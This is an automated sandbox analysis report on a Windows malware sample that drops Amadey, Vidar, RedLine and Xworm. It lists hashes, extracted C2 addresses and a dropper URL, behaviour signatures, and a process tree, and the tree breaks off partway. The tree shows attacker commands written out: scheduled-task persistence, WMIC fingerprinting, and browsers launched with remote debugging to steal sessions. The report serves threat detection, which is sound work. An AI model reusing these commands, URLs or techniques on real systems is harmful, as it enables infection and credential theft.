Analysis

  • max time kernel
    125s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04/03/2025, 08:56

General

  • Target

    ec4e01d7791c36b423656cffe6b64973.exe

  • Size

    2.0MB

  • MD5

    ec4e01d7791c36b423656cffe6b64973

  • SHA1

    19c653337b0b1efffa4f3fc5bc10220b2276e212

  • SHA256

    37ed815b936087889df2431acf87e6a85cee52ee5c876ac5f2df34ae5a64282c

  • SHA512

    3bdc0c269d159f928ad85e6f9af931ad2aece02da8642901e9dd2f8a71f8b0e64361e2077b8c1328a9d90bcfa8088dc8117c3b98e94aad68543de833ae76b8cc

  • SSDEEP

    49152:/f29psxNT9+WnclB3qW3tgP1ZF4yYhatlr+rxCa/rc:H2wxZcl53tgP3uy3lr+wa/r

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

vidar

Botnet

ir7am

C2

https://t.me/l793oy

https://steamcommunity.com/profiles/76561199829660832

Attributes
  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0

Extracted

Family

redline

Botnet

testproliv

C2

45.155.103.183:1488

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detect Vidar Stealer 18 IoCs
  • Detect Xworm Payload 1 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 1 IoCs
  • Redline family
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file 14 IoCs
  • Uses browser remote debugging 2 TTPs 21 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • .NET Reactor proctector 2 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks BIOS information in registry 2 TTPs 12 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 37 IoCs
  • Identifies Wine through registry keys 2 TTPs 6 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 5 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Windows directory 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Detects Pyinstaller 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 36 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 5 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 11 IoCs
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies system certificate store 2 TTPs 6 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\ec4e01d7791c36b423656cffe6b64973.exe
    "C:\Users\Admin\AppData\Local\Temp\ec4e01d7791c36b423656cffe6b64973.exe"
    1⤵
    • Adds Run key to start application
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2636
    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1s89v4.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1s89v4.exe
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of WriteProcessMemory
      PID:5112
      • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
        "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
        3⤵
        • Downloads MZ/PE file
        • Checks computer location settings
        • Executes dropped EXE
        • Adds Run key to start application
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4940
        • C:\Users\Admin\AppData\Local\Temp\10068150101\3Mv6i65.exe
          "C:\Users\Admin\AppData\Local\Temp\10068150101\3Mv6i65.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:4888
          • C:\Users\Admin\AppData\Local\Temp\10068150101\3Mv6i65.exe
            "C:\Users\Admin\AppData\Local\Temp\10068150101\3Mv6i65.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            PID:4332
        • C:\Users\Admin\AppData\Local\Temp\10074170101\khykuQw.exe
          "C:\Users\Admin\AppData\Local\Temp\10074170101\khykuQw.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:2324
        • C:\Users\Admin\AppData\Local\Temp\10075800101\zY9sqWs.exe
          "C:\Users\Admin\AppData\Local\Temp\10075800101\zY9sqWs.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:2736
        • C:\Users\Admin\AppData\Local\Temp\10077160101\bPDDW9F.exe
          "C:\Users\Admin\AppData\Local\Temp\10077160101\bPDDW9F.exe"
          4⤵
          • Downloads MZ/PE file
          • Executes dropped EXE
          • Adds Run key to start application
          PID:2220
          • C:\Users\Admin\AppData\Local\Temp\WinTemp\Microsoft Edge Protect.exe
            "C:\Users\Admin\AppData\Local\Temp\WinTemp\Microsoft Edge Protect.exe"
            5⤵
            • Executes dropped EXE
            PID:5752
            • C:\Users\Admin\AppData\Local\Temp\WinTemp\Microsoft Edge Protect.exe
              "C:\Users\Admin\AppData\Local\Temp\WinTemp\Microsoft Edge Protect.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              PID:3124
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "ver"
                7⤵
                  PID:5792
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "wmic cpu get ProcessorId"
                  7⤵
                    PID:5724
                    • C:\Windows\System32\Wbem\WMIC.exe
                      wmic cpu get ProcessorId
                      8⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:5688
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "WMIC BIOS GET SERIALNUMBER"
                    7⤵
                      PID:4168
                      • C:\Windows\System32\Wbem\WMIC.exe
                        WMIC BIOS GET SERIALNUMBER
                        8⤵
                          PID:992
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "WMIC COMPUTERSYSTEM GET MODEL"
                        7⤵
                          PID:6072
                          • C:\Windows\System32\Wbem\WMIC.exe
                            WMIC COMPUTERSYSTEM GET MODEL
                            8⤵
                              PID:5996
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "WMIC COMPUTERSYSTEM GET MANUFACTURER"
                            7⤵
                              PID:6064
                              • C:\Windows\System32\Wbem\WMIC.exe
                                WMIC COMPUTERSYSTEM GET MANUFACTURER
                                8⤵
                                  PID:4580
                        • C:\Users\Admin\AppData\Local\Temp\10077440101\d0HNrLB.exe
                          "C:\Users\Admin\AppData\Local\Temp\10077440101\d0HNrLB.exe"
                          4⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          • System Location Discovery: System Language Discovery
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:4976
                          • C:\Users\Admin\AppData\Local\Temp\10077440101\d0HNrLB.exe
                            "C:\Users\Admin\AppData\Local\Temp\10077440101\d0HNrLB.exe"
                            5⤵
                            • Checks computer location settings
                            • Drops startup file
                            • Executes dropped EXE
                            • Adds Run key to start application
                            • System Location Discovery: System Language Discovery
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:4020
                            • C:\Windows\SysWOW64\schtasks.exe
                              "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "d0HNrLB" /tr "C:\Users\Admin\AppData\Roaming\d0HNrLB.exe"
                              6⤵
                              • System Location Discovery: System Language Discovery
                              • Scheduled Task/Job: Scheduled Task
                              PID:4880
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 4976 -s 960
                            5⤵
                            • Program crash
                            PID:3972
                        • C:\Users\Admin\AppData\Local\Temp\10077730101\JCFx2xj.exe
                          "C:\Users\Admin\AppData\Local\Temp\10077730101\JCFx2xj.exe"
                          4⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          • System Location Discovery: System Language Discovery
                          • Suspicious use of WriteProcessMemory
                          PID:5112
                          • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                            "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                            5⤵
                            • System Location Discovery: System Language Discovery
                            • Checks processor information in registry
                            • Suspicious behavior: EnumeratesProcesses
                            PID:3480
                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                              6⤵
                              • Uses browser remote debugging
                              • Enumerates system info in registry
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of FindShellTrayWindow
                              PID:3940
                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffc1ee1cc40,0x7ffc1ee1cc4c,0x7ffc1ee1cc58
                                7⤵
                                  PID:2752
                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2088,i,3746291255020805463,16627803308366535650,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2084 /prefetch:2
                                  7⤵
                                    PID:2316
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1908,i,3746291255020805463,16627803308366535650,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2256 /prefetch:3
                                    7⤵
                                      PID:2084
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2132,i,3746291255020805463,16627803308366535650,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2312 /prefetch:8
                                      7⤵
                                        PID:3528
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3168,i,3746291255020805463,16627803308366535650,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3188 /prefetch:1
                                        7⤵
                                        • Uses browser remote debugging
                                        PID:2324
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3224,i,3746291255020805463,16627803308366535650,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3320 /prefetch:1
                                        7⤵
                                        • Uses browser remote debugging
                                        PID:1356
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4496,i,3746291255020805463,16627803308366535650,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4552 /prefetch:1
                                        7⤵
                                        • Uses browser remote debugging
                                        PID:768
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4720,i,3746291255020805463,16627803308366535650,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4236 /prefetch:8
                                        7⤵
                                          PID:4448
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3628,i,3746291255020805463,16627803308366535650,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4748 /prefetch:8
                                          7⤵
                                            PID:3596
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                          6⤵
                                          • Uses browser remote debugging
                                          • Enumerates system info in registry
                                          • Modifies data under HKEY_USERS
                                          • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                          • Suspicious use of AdjustPrivilegeToken
                                          • Suspicious use of FindShellTrayWindow
                                          PID:5832
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffc1ee1cc40,0x7ffc1ee1cc4c,0x7ffc1ee1cc58
                                            7⤵
                                              PID:5844
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1944,i,4979305324130067039,3843458596716563795,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1892 /prefetch:2
                                              7⤵
                                                PID:6016
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2176,i,4979305324130067039,3843458596716563795,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2248 /prefetch:3
                                                7⤵
                                                  PID:6044
                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2268,i,4979305324130067039,3843458596716563795,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2476 /prefetch:8
                                                  7⤵
                                                    PID:6088
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3148,i,4979305324130067039,3843458596716563795,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3168 /prefetch:1
                                                    7⤵
                                                    • Uses browser remote debugging
                                                    PID:3660
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3176,i,4979305324130067039,3843458596716563795,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3200 /prefetch:1
                                                    7⤵
                                                    • Uses browser remote debugging
                                                    PID:1848
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4468,i,4979305324130067039,3843458596716563795,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4476 /prefetch:1
                                                    7⤵
                                                    • Uses browser remote debugging
                                                    PID:2700
                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4684,i,4979305324130067039,3843458596716563795,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1284 /prefetch:8
                                                    7⤵
                                                      PID:1568
                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4704,i,4979305324130067039,3843458596716563795,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4816 /prefetch:8
                                                      7⤵
                                                        PID:3528
                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4456,i,4979305324130067039,3843458596716563795,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4772 /prefetch:8
                                                        7⤵
                                                          PID:5368
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4792,i,4979305324130067039,3843458596716563795,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4788 /prefetch:8
                                                          7⤵
                                                            PID:5436
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4756,i,4979305324130067039,3843458596716563795,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5064 /prefetch:8
                                                            7⤵
                                                              PID:5352
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5224,i,4979305324130067039,3843458596716563795,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4696 /prefetch:8
                                                              7⤵
                                                                PID:5544
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5236,i,4979305324130067039,3843458596716563795,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4744 /prefetch:8
                                                                7⤵
                                                                  PID:5648
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5456,i,4979305324130067039,3843458596716563795,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4748 /prefetch:8
                                                                  7⤵
                                                                    PID:4236
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5156,i,4979305324130067039,3843458596716563795,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5376 /prefetch:2
                                                                    7⤵
                                                                    • Uses browser remote debugging
                                                                    PID:184
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                  6⤵
                                                                  • Uses browser remote debugging
                                                                  • Enumerates system info in registry
                                                                  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                  • Suspicious use of FindShellTrayWindow
                                                                  PID:5360
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffc216f46f8,0x7ffc216f4708,0x7ffc216f4718
                                                                    7⤵
                                                                    • Checks processor information in registry
                                                                    • Enumerates system info in registry
                                                                    PID:5156
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1948,12342146210455848537,3418330743364404026,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1980 /prefetch:2
                                                                    7⤵
                                                                      PID:2904
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1948,12342146210455848537,3418330743364404026,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2324 /prefetch:3
                                                                      7⤵
                                                                        PID:6120
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1948,12342146210455848537,3418330743364404026,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2448 /prefetch:2
                                                                        7⤵
                                                                          PID:5140
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1948,12342146210455848537,3418330743364404026,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2580 /prefetch:2
                                                                          7⤵
                                                                            PID:2580
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1948,12342146210455848537,3418330743364404026,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2264 /prefetch:8
                                                                            7⤵
                                                                              PID:4032
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1948,12342146210455848537,3418330743364404026,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
                                                                              7⤵
                                                                              • Uses browser remote debugging
                                                                              PID:5532
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
